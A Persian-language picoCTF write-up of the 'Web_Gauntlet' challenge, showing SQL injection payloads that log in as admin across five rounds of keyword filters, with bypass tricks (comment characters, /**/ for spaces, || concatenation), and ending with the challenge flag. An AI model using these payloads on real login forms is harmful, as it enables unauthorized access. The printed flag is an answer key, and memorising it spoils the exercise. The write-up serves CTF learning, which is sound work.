پرش به محتویات

Web_Gauntlet

سلام بر همه‌ی دوستان گرامی ctf
با یه چالش وب اومدیم از picoCTF قراره کلی injection انجام بدیم :))

میدونیم که تو لینک filters کاراکترهای فیلتر شده رو برامون نوشته و باید بدون استفاده از اونها injetion انجام بدیم. site باید اینجا سعی کنیم در 5 راند متوالی به عنوان ادمین وارد بشیم.

راند یک:

از or نمی‌تونیم استفاده کنیم.

Payload

admin' ; --

صرفا کافیه که بیایم یوزرنیم رو برابر admin بذاریم و باقی ماجرا رو کامنت کنیم.

راند دو:

رشته های غیر مجاز:

or and like = --

payload:

admin'; #

همون داستان قبلی فقط به جای -- از # استفاده می‌کنیم!

راند سه:

رشته های غیر مجاز:

or and = like > < --

اینجا حتی نمی‌تونیم از space استفاده کنیم !!!

payload:

admin';#

همون قبلی مثل اینکه جواب میده!!!

نکته

اگر اینجا مشکل space داشتیم می‌تونستیم از /**/ استفاده کنیم به جای space.

راند چهار:

رشته های غیر مجاز:

or and = like > < -- admin

خب عالی شد. حتی از admin هم نمی‌تونیم استفاده کنیم. احتمالا باید بگردیم دنبال concat کردن استرینگ تو کامندهای sql.

payload:

admi'||'n';#

ظاهرا || به عنوان concat کار می‌کنه!

راند آخر:

or and = like > < -- admin union خب ما که تو راند قبلی از union استفاده نکردیم. پس بیاین اینجا همون payload قبلی رو استفاده کنیم.

payload:

admi'||'n';#

فلگ رو یافتیم !!!

FLAG 🚩

picoCTF{y0u_m4d3_1t_d846125f7bdbf4d6e89cbc5edb6fa739}


نویسنده

sw33tw3as3l